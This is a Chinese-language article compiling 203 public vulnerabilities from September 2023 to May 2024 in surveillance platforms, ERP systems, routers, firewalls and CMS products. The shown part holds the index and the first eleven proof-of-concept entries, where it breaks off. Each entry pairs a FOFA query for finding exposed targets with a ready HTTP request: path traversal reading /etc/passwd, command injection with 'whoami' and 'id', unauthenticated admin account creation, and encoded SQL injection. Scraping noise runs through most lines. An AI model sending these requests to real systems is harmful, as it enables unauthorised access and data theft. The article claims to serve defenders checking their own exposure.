互联网公开漏洞整理202309-202406
3 Q( L _& [" _) q& q8 A$ b道一安全 2024-06-05 07:41 北京
8 X5 y Q8 ?% m6 F6 X) R' C以下文章来源于网络安全新视界 ,作者网络安全新视界& _2 `7 N5 r1 s. Z" K E6 p/ n* b2 P
+ f, y4 o1 ^: d( N5 U# o6 T发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。# Q& @8 w% G' U- ~# N
$ }6 a* Q9 j9 A. ^" u" d漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
4 G$ |- \7 J: C) t! }/ a( e& v& x! Y/ A+ U1 R v
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。
) d+ Y& f3 A2 Y
9 E- ?- N7 O! }7 d( q" x4 n% J文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
1 q. U6 T7 H- x x, S( b" Q2 Z. w* S @, ~: h% W0 l
合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
* L6 Z2 {0 W+ K
5 h5 A6 y1 y; h( `
2 F, a- u; E/ } z% T声明6 p- \' H- m5 r. C
! ?* w3 `6 }* H1 i0 b0 z7 @为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
6 f) l- O+ Y- x
+ v4 k9 s0 S% O) z有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。0 L; y% W5 j) X1 v( d* v3 o
V* H! _9 n, k- J
U. ?" q% |2 p8 `# n1 `- B4 q5 o g s: _
目录5 k0 U; M6 O! _1 [, h- B/ j8 V
' O7 o$ a4 g; m9 N! @5 L' {! r g
01
6 |) A/ F& F2 B4 D8 o" I$ I$ m6 t; }' f& w
1. StarRocks MPP数据库未授权访问
$ N. E0 q' m& q: d2. Casdoor系统static任意文件读取
& Z5 N* f. G* U# o$ E$ ]4 y/ m, X3. EasyCVR智能边缘网关 userlist 信息泄漏$ j' Y( T5 o9 Y% L( u
4. EasyCVR视频管理平台存在任意用户添加
0 c4 c+ e& `5 ?1 P% J+ ^5 h! y5. NUUO NVR 视频存储管理设备远程命令执行
! i( N1 |, z# e# ]$ d6. 深信服 NGAF 任意文件读取
4 H5 j1 g( U% ~7. 鸿运主动安全监控云平台任意文件下载
6 A" S% u6 B9 T8 l6 o8. 斐讯 Phicomm 路由器RCE
5 e# q) j2 _ P L' ~. Z( Q9. 稻壳CMS keyword 未授权SQL注入% z+ B" b# u/ Q
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传- ?/ l+ E6 X- J! m
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
) m1 A# R, `& S* v$ j# `- ~12. Jorani < 1.0.2 远程命令执行
& D% y. L8 z6 ~ k13. 红帆iOffice ioFileDown任意文件读取" y# |8 F8 u! E A* x& f; N
14. 华夏ERP(jshERP)敏感信息泄露
5 r+ v |, Q( P: z/ `15. 华夏ERP getAllList信息泄露
J9 t2 x' n/ N16. 红帆HFOffice医微云SQL注入$ ~, N) X5 f% j7 N: F6 @
17. 大华 DSS itcBulletin SQL 注入
9 c5 `; Z0 Z3 T18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
: o, z0 W& ^2 x6 P5 t: z19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
" c* s! h. n4 ]4 I5 A% L20. 大华ICC智能物联综合管理平台任意文件读取
3 k! B" J" Y% y% ^& d21. 大华ICC智能物联综合管理平台random远程代码执行1 A$ r6 z% Z. v. O* |
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
& }' d' j- R3 m2 [23. 大华ICC智能物联综合管理平台 fastjson远程代码执行- y& U# K- @3 I; }
24. 用友NC 6.5 accept.jsp任意文件上传, [7 c/ i! r2 ?* Z
25. 用友NC registerServlet JNDI 远程代码执行
# G7 c1 ^- s3 N2 n$ W26. 用友NC linkVoucher SQL注入
7 P8 y7 e; Y& ?6 |. i27. 用友 NC showcontent SQL注入) ^, [9 i2 v! t& A3 ], x/ ~
28. 用友NC grouptemplet 任意文件上传
3 D6 X2 e* e2 g: B0 {( B2 n; M29. 用友NC down/bill SQL注入
: |9 S& {# e) l; i' G W6 B30. 用友NC importPml SQL注入; ], v8 p& ~. U* f7 ?
31. 用友NC runStateServlet SQL注入
) @" S8 y9 Z- Z# c2 o: J% D32. 用友NC complainbilldetail SQL注入
) M4 p, a& G& k6 b6 T3 Q( r33. 用友NC downTax/download SQL注入( D: X4 f& q* P( m( R# w2 O
34. 用友NC warningDetailInfo接口SQL注入. a: ?9 Q3 _: V) B' E6 ~
35. 用友NC-Cloud importhttpscer任意文件上传4 t3 G/ J: e) q6 x( A1 e
36. 用友NC-Cloud soapFormat XXE8 e5 }/ G* D8 O8 j9 w' U; \7 {
37. 用友NC-Cloud IUpdateService XXE W2 E: v3 b& U# m- ?+ F
38. 用友U8 Cloud smartweb2.RPC.d XXE, Q; h8 |2 U7 m9 ~7 [0 q
39. 用友U8 Cloud RegisterServlet SQL注入( b8 C+ H* S+ h" |! \
40. 用友U8-Cloud XChangeServlet XXE
0 t6 g7 A, V. e( {$ ~+ ]1 u41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
+ Q. \6 g: O d$ E" w2 h5 A42. 用友GRP-U8 SmartUpload01 文件上传) [- |8 s1 l! q# ?. y
43. 用友GRP-U8 userInfoWeb SQL注入致RCE
# g. v3 D0 U" l7 D0 t6 b9 q44. 用友GRP-U8 bx_dj_check.jsp SQL注入
" b* ]3 E0 O. @$ h( S. I i45. 用友GRP-U8 ufgovbank XXE
1 r: x' i; S6 j- {3 j* |: i46. 用友GRP-U8 sqcxIndex.jsp SQL注入$ l6 Z/ G; j3 U. `+ N
47. 用友GRP A++Cloud 政府财务云 任意文件读取7 v8 ~1 O" ^6 X' W v
48. 用友U8 CRM swfupload 任意文件上传
# e, t9 Y- D& ?6 _9 e49. 用友U8 CRM系统uploadfile.php接口任意文件上传
' X( L# }/ y+ N, d' r8 e50. QDocs Smart School 6.4.1 filterRecords SQL注入1 {" Q6 ?) A7 U" e, i( Y
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
- m @$ X: k: U5 @1 a6 ~52. 泛微E-Office json_common.php sql注入& V5 ~0 D( [$ T2 f
53. 迪普 DPTech VPN Service 任意文件上传
3 m4 Q: I( Y) L54. 畅捷通T+ getstorewarehousebystore 远程代码执行5 E6 T1 z2 t8 j* j) w" Y6 J
55. 畅捷通T+ getdecallusers信息泄露( a6 t* Y# K3 u3 E) e1 \$ l6 A# N) Z$ `
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
6 Z0 ?. t1 j$ \* a% u57. 畅捷通T+ keyEdit.aspx SQL注入
+ B8 ?7 {9 l) z0 l+ e58. 畅捷通T+ KeyInfoList.aspx sql注入
- Z7 O: E2 m* q6 L2 D+ ~( F$ d0 g! I59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行, R# @# ]) D3 P \- Z! t# T" e5 y) I
60. 百卓Smart管理平台 importexport.php SQL注入
& M' a m7 h$ t# H' `6 F61. 浙大恩特客户资源管理系统 fileupload 任意文件上传7 N3 u9 O- x) M/ `/ ?2 M0 Y3 O* a
62. IP-guard WebServer 远程命令执行' Y6 f" b v+ Z; c9 {) i2 L! M
63. IP-guard WebServer任意文件读取 _3 c5 o# _/ p% o$ o
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
$ I S" \7 Z: r) R$ i) N65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过' b8 |; R1 w. p& g2 b
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入 B( w7 @4 a& u3 i+ g$ p( V/ g
67. 万户ezOFFICE wpsservlet任意文件上传3 ~" K, \5 l o, _
68. 万户ezOFFICE wf_printnum.jsp SQL注入
& X- m8 y0 s; }6 _69. 万户 ezOFFICE contract_gd.jsp SQL注入
# ^- I8 P* {9 l& r70. 万户ezEIP success 命令执行
% X+ @4 F. c9 J0 ^8 S71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
" Z, Z1 Z; n- d3 ~/ `9 c% X72. 致远OA getAjaxDataServlet XXE
2 B$ X t6 Q( l' ~73. GeoServer wms远程代码执行. P0 E8 j! E9 p( i: ~2 _+ R
74. 致远M3-server 6_1sp1 反序列化RCE! y) N8 T$ V; v2 z( C
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
' H3 K' v# Z1 a J3 a: b76. 新开普掌上校园服务管理平台service.action远程命令执行
: N8 T, g; C# {; H+ d8 d$ l77. F22服装管理软件系统UploadHandler.ashx任意文件上传 p( N0 g& ?/ q
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
: I; \' N' X- z8 S79. BYTEVALUE 百为流控路由器远程命令执行
6 t% ]1 k) X" Y7 O80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
6 H" T6 m* R; n' Q4 v# C81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
; j$ Z; E# C" K/ S/ U82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行! I7 F% }# H+ {3 l" O9 _% g
83. JeecgBoot testConnection 远程命令执行1 Z4 I' Z0 ?9 i: s; _ Z
84. Jeecg-Boot JimuReport queryFieldBySql 模板注入# B* P2 o. i1 h$ x
85. SysAid On-premise< 23.3.36远程代码执行. n/ e5 J2 N& j, ^$ a; I" f
86. 日本tosei自助洗衣机RCE p6 B7 b9 v; s" L! I
87. 安恒明御安全网关aaa_local_web_preview文件上传
5 R* e1 g$ l, V+ E+ X88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行6 }& ^/ q* j9 U6 `; e' n, X
89. 致远互联FE协作办公平台editflow_manager存在sql注入- N, z& Y5 H! y2 O
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
! B5 x; d) X& O$ r6 N, L: t91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取* z8 s( M7 |5 ^& I' N
92. 海康威视运行管理中心session命令执行
1 I. A8 P- o+ Y7 X) _93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传6 q$ `' y) O. C3 ^+ s) o) A
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
, ~, F4 T5 Q+ Q) e+ h) g* d; J+ v95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
* p c- S3 I+ l; b0 r G96. Apache OFBiz 18.12.11 groovy 远程代码执行& m* U! n- t3 F5 |' d
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
5 ^3 u% ~; @* D5 o; h2 r/ E98. SpiderFlow爬虫平台远程命令执行( A W* @" B4 ~1 l" j* d
99. Ncast盈可视高清智能录播系统busiFacade RCE
0 d# h; I/ L7 G# l. y100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
' L/ |( u$ r3 `! t, r101. ivanti policy secure-22.6命令注入
& D9 v6 s" \) X! U, K102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
@% Z. o ^! U) b0 l, k+ l- B3 n103. Ivanti Pulse Connect Secure VPN XXE
; q9 @, Y! a6 {- }7 p+ m104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露
/ d# t: |: [0 A2 j6 }105. SpringBlade v3.2.0 export-user SQL 注入
% |9 C3 E7 l# W9 x106. SpringBlade dict-biz/list SQL 注入0 Q* p, h, a* n
107. SpringBlade tenant/list SQL 注入
. f. x* `0 g: L: G3 Q$ M% V108. D-Tale 3.9.0 SSRF
8 o ^" j8 v. `5 W8 g0 C. L# _109. Jenkins CLI 任意文件读取' X7 t3 D! c5 M) D
110. Goanywhere MFT 未授权创建管理员' l& \8 B7 Z! q
111. WordPress Plugin HTML5 Video Player SQL注入 P- k1 R; `( H. `7 h+ @
112. WordPress Plugin NotificationX SQL 注入
: A4 `7 `' O2 d( \5 T8 r113. WordPress Automatic 插件任意文件下载和SSRF+ i" I, B3 m3 v+ d* z* H! f f. s; d
114. WordPress MasterStudy LMS插件 SQL注入
- ?( Y) m7 r) [115. WordPress Bricks Builder <= 1.9.6 RCE
f1 |% E7 ]5 B& K$ r& [) o9 Q116. wordpress js-support-ticket文件上传
/ d8 o" t) S9 G# m0 a4 v& e* S117. WordPress LayerSlider插件SQL注入
' r \) w' f3 E3 C118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
# V# T1 i/ j" X; s$ E6 Y119. 北京百绰智能S20后台sysmanageajax.php sql注入
0 H6 \7 T: F5 F3 {120. 北京百绰智能S40管理平台导入web.php任意文件上传/ w! ?( q% g6 B: u' P7 b
121. 北京百绰智能S42管理平台userattestation.php任意文件上传$ T% }! Z" U5 w5 q9 P2 x, ~# S
122. 北京百绰智能s200管理平台/importexport.php sql注入# P3 U# k' T7 o+ f
123. Atlassian Confluence 模板注入代码执行
7 i( N4 P. a7 g: @% S124. 湖南建研工程质量检测系统任意文件上传
( q8 q- b1 k, h9 d4 _3 y125. ConnectWise ScreenConnect身份验证绕过
6 B! E: H9 }3 ~2 Z126. Aiohttp 路径遍历
& }& t: k5 h8 f+ g2 B6 b9 V' q127. 广联达Linkworks DataExchange.ashx XXE# o7 |. G9 Q/ a3 E p6 r* n
128. Adobe ColdFusion 反序列化
; q. O& m9 G/ t5 ]* l129. Adobe ColdFusion 任意文件读取+ \) V; T0 L) B. W/ M! M) e
130. Laykefu客服系统任意文件上传
3 B1 D" T7 D: R+ l, `131. Mini-Tmall <=20231017 SQL注入9 `' B/ S! Q- ~0 M# v* f8 C
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
0 Z6 F9 E: f# K133. H5 云商城 file.php 文件上传
9 g, E3 G5 y' K& v9 G134. 网康NS-ASG应用安全网关index.php sql注入: k: H/ G; E1 T4 U
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入( P- G6 ~2 R. l
136. NextChat cors SSRF- j9 t( J) v( O: f4 R8 I. U
137. 福建科立迅通信指挥调度平台down_file.php sql注入$ S+ {8 e- Z- \" _
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
! m/ Q. |# E- W* D4 C139. 福建科立讯通信指挥调度平台editemedia.php sql注入
5 a$ Z: Y; i) \+ z% Q# ?' }! S140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入) b9 u+ l* p" W8 U" M9 \
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入/ K0 j) E) z* J/ g
142. CMSV6车辆监控平台系统中存在弱密码
' D6 o6 R$ J; f; M& V143. Netis WF2780 v2.1.40144 远程命令执行
0 b. P# N. [7 S" ?" w) p144. D-Link nas_sharing.cgi 命令注入
* I2 X5 E9 I6 E- h# o8 \145. Palo Alto Networks PAN-OS GlobalProtect 命令注入0 p- x' Q& X; v% Q- o0 O( r
146. MajorDoMo thumb.php 未授权远程代码执行1 G. ^: k* o& }8 S2 |' r! S
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
5 [, j" i4 g3 ?* r+ e148. CrushFTP 认证绕过模板注入+ y3 D9 t. K" \7 _
149. AJ-Report开源数据大屏存在远程命令执行3 O; s' `5 ^+ a) m6 y
150. AJ-Report 1.4.0 认证绕过与远程代码执行
1 b/ K& A5 I; T( ~0 I151. AJ-Report 1.4.1 pageList sql注入
/ L6 N/ H4 q5 e \- E! S4 I, N152. Progress Kemp LoadMaster 远程命令执行
. W" P d& v$ L" i153. gradio任意文件读取. R# |: G3 J5 L8 d- E
154. 天维尔消防救援作战调度平台 SQL注入
7 C c2 Q2 r. S+ Y% \8 `( M155. 六零导航页 file.php 任意文件上传
, g" W7 h R/ ?& p156. TBK DVR-4104/DVR-4216 操作系统命令注入6 u1 G7 s3 A! p1 z5 x3 h) W$ ?
157. 美特CRM upload.jsp 任意文件上传
. m. f" n( D* H1 v9 g158. Mura-CMS-processAsyncObject存在SQL注入
/ O0 W8 L3 u- Q: }3 l$ Z2 s- E159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传9 w& w, d( e& Y* E1 q/ G" @8 s8 k% M
160. Sonatype Nexus Repository 3目录遍历与文件读取' }2 I9 j4 q" v
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传
! G" j: ]% x5 p9 Q2 q; i: Y! y1 Z162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传1 V7 o4 {6 c) w* n$ [
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传5 M" r: d" Q: ^( p
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
9 d7 Z* `7 X/ p0 L6 d( U/ d165. OrangeHRM 3.3.3 SQL 注入# M x l0 l7 v4 e. D! D1 h
166. 中成科信票务管理平台SeatMapHandler SQL注入/ s# h7 r) ~1 q$ h) F
167. 精益价值管理系统 DownLoad.aspx任意文件读取
7 y1 E+ B" u4 `; I* h4 K; I168. 宏景EHR OutputCode 任意文件读取
+ Z- m+ I( U5 M169. 宏景EHR downlawbase SQL注入
' n* i9 ^7 ?6 \( O* h1 V. m1 B170. 宏景EHR DisplayExcelCustomReport 任意文件读取3 S' u- {; y+ Q: Z$ N
171. 通天星CMSV6车载定位监控平台 SQL注入
5 ]+ a7 q1 ?; ~9 v$ K7 u172. DT-高清车牌识别摄像机任意文件读取
, G8 H% I$ ^- J, q173. Check Point 安全网关任意文件读取
. i. F% L2 p; Q# M174. 金和OA C6 FileDownLoad.aspx 任意文件读取
3 H4 n4 h' E$ o. {- n8 U175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入! o; h( g+ Z" Y5 h
176. 电信网关配置管理系统 rewrite.php 文件上传) E( w1 i+ ]5 \
177. H3C路由器敏感信息泄露& |! A/ P: X! N
178. H3C校园网自助服务系统-flexfileupload-任意文件上传* }9 x' C$ c9 E4 h, E0 a) X% c
179. 建文工程管理系统存在任意文件读取5 v" w2 F, y, B+ }, B% T+ m* _
180. 帮管客 CRM jiliyu SQL注入( W1 W+ ~- u$ Q$ B, C5 A. T$ D
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
H: b( G5 o+ h" Z8 D, T# l% z3 C182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
9 S( k4 V- C Z7 ?8 F5 V183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入( K6 @4 y& }1 g& |' J* |* o6 J
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
! Z2 _; i$ p0 U: c# q185. 瑞友天翼应用虚拟化系统SQL注入
8 M, ]& S7 ]: a( r186. F-logic DataCube3 SQL注入; u) G. z* ^5 u9 a& F/ `
187. Mura CMS processAsyncObject SQL注入
3 w& o7 U7 Z5 K1 T5 H3 F188. 叁体-佳会视频会议 attachment 任意文件读取& O1 D+ ~1 \) O* D1 N+ S8 N) p" x
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
% O# w/ `. j) k: O6 @/ i190. 短视频矩阵营销系统 poihuoqu 任意文件读取
% }4 ~& s O) T$ }191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
5 k& q# Q9 C. G. p192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
+ \! W# R- M) j7 N" x+ U. F193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行2 p! y g- f' J3 _2 w, ^* y
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
" P' _1 D0 {# u- S: S! a195. 飞鱼星上网行为管理系统 send_order.cgi命令执行8 |; k+ W! v. k3 Z6 q
196. 河南省风速科技统一认证平台密码重置
+ W1 v+ n( b% M C8 s2 _: y4 `197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入9 H1 ^7 R2 ?( W6 Z
198. 阿里云盘 WebDAV 命令注入
" Z$ l5 @1 N* {& o199. cockpit系统assetsmanager_upload接口 文件上传
% d' q# a$ t, U# G200. SeaCMS海洋影视管理系统dmku SQL注入. k+ o$ y6 ]0 M, s9 ^
201. 方正全媒体新闻采编系统 binary SQL注入
5 Z1 a8 s9 i% W/ ^% f' f/ _5 E202. 微擎系统 AccountEdit任意文件上传7 N: }5 e7 L* n7 {' F+ q1 L2 ~
203. 红海云EHR PtFjk 文件上传8 O+ ^4 Q" `1 l2 w1 ~2 z9 ]) J
- j' m1 t# ^6 c; \7 K
POC列表9 Z5 O9 r( m4 J% b, @1 O5 K! a
4 @- ]0 J& l* J6 z! D4 N02
! \% x& k( c! A
7 t7 P, j; [6 ?, ]! v! g$ l/ W# c1. StarRocks MPP数据库未授权访问, T6 v/ _4 w8 D$ b9 J
FOFA :title="StarRocks"" H3 d& {6 g9 X1 w+ u
GET /mem_tracker HTTP/1.1
' c5 \1 t& i" R, \! ]( ]Host: URL5 n% }6 `$ @8 x* K
/ [% o3 f* d) ?9 _. W6 ~& f
1 U& r% T7 W( L2. Casdoor系统static任意文件读取/ J& p! x( g# y6 o; {
FOFA :title="Casdoor"* Y# U+ ~' z! i& a: L; v
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1/ F' e$ [: U+ W/ |7 k. J/ t
Host: xx.xx.xx.xx:99995 F' E6 ~, Q' {& E1 f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
6 b, g# L# ^0 [/ p0 ]Connection: close5 R& X3 [( o5 E% M
Accept: */*7 b% s2 ^- w, Y& `# m: Q {9 G
Accept-Language: en& p0 o& G( |0 b8 n6 |% z4 g# H
Accept-Encoding: gzip
5 S' t2 u; r. {0 T; M$ l2 ]5 W
. [0 y. v! q. s* ]7 p' O; h% m' }) N6 H9 ? b
3. EasyCVR智能边缘网关 userlist 信息泄漏
, r) a, U, _$ D& \# RFOFA :title="EasyCVR"% C, T8 i+ C. `' s* F
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.17 K' k; ~; S6 ?& [' Z! D- U# ^9 U
Host: xx.xx.xx.xx O2 p3 K! A' m6 s( q$ t8 @7 g- |+ X
$ l, a1 n3 a+ `9 @* _& L3 X+ l/ g
4. EasyCVR视频管理平台存在任意用户添加% x' t. t- V! C* R
FOFA :title="EasyCVR"
- Q# J$ O' B6 m+ K4 k5 {5 y6 \
* i2 S; s/ Z5 C& C7 Lpassword更改为自己的密码md5, H) t/ v( v8 A3 T w
POST /api/v1/adduser HTTP/1.1, _% c2 A l5 P; m3 l k
Host: your-ip- w- j. c6 ^0 f
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
( L. K: |/ x2 f9 F" g( h* i, ?4 H/ Y. K1 u1 R1 ^
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1, y" F5 T( w' m: a, v" p
a- _0 @) }8 `2 v5 ]7 ~3 n5 p) w' W: ~ X! M
5. NUUO NVR 视频存储管理设备远程命令执行
& z) Y; f' ]- B1 n& NFOFA:title="Network Video Recorder Login"7 ]! N( r# q+ [3 _ V
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.14 E; k+ u g+ [. L! s8 k4 D$ t
Host: xx.xx.xx.xx6 q2 p$ ~5 h# c W3 S
. z0 N2 B" r- e5 ]' _
; x$ V9 q5 u; r. H$ v: M, `2 D# E6. 深信服 NGAF 任意文件读取
2 j. T1 K% S, O1 J0 m/ A' WFOFA:title="SANGFOR | NGAF"
9 a/ `3 L2 e' y" kGET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1) V! u8 K: z8 ~; Y8 ~9 C
Host:1 m3 f5 d# _1 _3 F; S4 _! ?- }
4 \2 _2 u/ j' Z7 f: q+ h8 r" ^6 T7 a
- p% s5 e, ]$ u! r+ R0 | R1 @
7. 鸿运主动安全监控云平台任意文件下载- {' B. @, g( N, d7 R" d
FOFA:body="./open/webApi.html"
4 O- w8 Q7 W& a: u) y( a6 {' LGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
5 O0 N0 A& F! HHost:2 J% X8 t; x1 O
. a/ Q! X0 O! ?1 f: c! i; j
' N) W0 T& Q9 Q# K8. 斐讯 Phicomm 路由器RCE! m$ ^$ r; n X
FOFA:icon_hash="-1344736688"8 b( Y0 S, _& Z: W
默认账号admin登录后台后,执行操作& ]; T; d9 L/ X' `$ D
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.19 Z2 c" M x2 z' \
Host: x.x.x.x& B1 @' X# F% ^4 o/ F' Y* _
Cookie: sysauth=第一步登录获取的cookie
8 n/ B4 n" U4 ~Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
9 P" j0 S Z" L: rUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 F2 y( v# B) ^ B
/ `" ^. \6 o& X; Y' j) K. {% b! i/ ^------WebKitFormBoundaryxbgjoytz
# m) m+ W5 l P* }Content-Disposition: form-data; name="wifiRebootEnablestatus"
% O7 X7 h/ L+ V H
0 {/ _5 T$ a9 n: n%s
4 X! r/ f0 t E6 ?& |% P% h------WebKitFormBoundaryxbgjoytz
' }6 Q! I9 @# C7 G7 J& |Content-Disposition: form-data; name="wifiRebootrange"2 J6 B9 M" E/ c0 L0 P, u
$ t; g4 k* K5 s/ }8 c1 n7 L" N) W12:00; id;
) Q3 Y2 ]& t0 @/ T o- t. I/ p/ K+ q------WebKitFormBoundaryxbgjoytz6 C; i$ ^7 Y# M% ?7 P4 E
Content-Disposition: form-data; name="wifiRebootendrange": c1 ?/ ~# a# U0 A+ f. J1 q9 A
+ p" F! r2 s; M+ o%s:
9 i9 v2 V; z% m------WebKitFormBoundaryxbgjoytz9 M% ~& ~3 j& a: D- Q' o8 ?8 K2 \
Content-Disposition: form-data; name="cururl2"7 Z8 g" q" l5 ?1 f
) R/ X7 P) }& e/ V+ c5 Z; A- ?( e# ^+ Q+ G
------WebKitFormBoundaryxbgjoytz--' N; w5 B% i4 q9 m( |
- l8 q" A/ w5 b9 \1 b" @% p! Z( k4 F" x8 d+ | K7 {
9. 稻壳CMS keyword 未授权SQL注入
4 {" b q" d; z$ uFOFA:app="Doccms"
9 Q1 o# [& H" ^/ pGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1. d! i! N7 }) r2 l! k d
Host: x.x.x.x/ ]6 z+ h9 Z: Z2 l8 X
+ {. ~% K8 b1 [+ k' U8 @9 b
( o5 C4 Y4 t6 n
payload为下列语句的二次Url编码
, O1 S0 j$ E: f" }3 l2 ~: i* [5 ?$ f: @+ e
' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#" o+ t' t) H+ k' _; B6 T i: _$ c
. ~9 B) X" T: U3 U! Y5 X# P5 F( H10. 蓝凌EIS智慧协同平台api.aspx任意文件上传& L& m q9 c- a" e! d1 h7 ~
FOFA:icon_hash="953405444"
; C- }+ O7 _2 v! U* V9 h/ a1 {/ o. h
文件上传后响应中包含上传文件的路径
" t4 ^& [9 I2 GPOST /eis/service/api.aspx?action=saveImg HTTP/1.1
' V3 `4 i% _$ i9 `Host: x.x.x.x:xx
6 s7 `9 \( o9 o, e; r( c7 tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36; b2 x: z5 z% I( o
Content-Length: 197
; f5 \8 G" e6 jAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' }7 x' z4 q8 }
Accept-Encoding: gzip, deflate5 I+ w' `! ~2 J. K* e! K' |
Accept-Language: zh-CN,zh;q=0.9
# z0 l! i! @% QConnection: close6 @* g2 ^! S. w' p: p
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu- Q ~+ d, O' g* ^: b9 i
( s5 H; ]. q6 h7 [+ q4 N------WebKitFormBoundaryxdgaqmqu- P- l# D% c' _4 r( E& q, O' B
Content-Disposition: form-data; name="file"filename="icfitnya.txt"
0 s* k9 p. b4 _4 Q" W2 ~9 nContent-Type: text/html. L. _! f- h, D( v
$ Z$ r7 d% s# \- v3 \jmnqjfdsupxgfidopeixbgsxbf4 u! t/ [. S7 u" w7 _
------WebKitFormBoundaryxdgaqmqu--
+ B9 {: n9 f3 Z1 A8 `
/ S7 a) F/ ~- z. {" }8 X5 M6 z; k5 i8 W1 n$ q8 s( e# X. l
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入5 c, r2 o# I2 b
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"* c8 Q* m, D6 W0 ~3 ] k( M
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
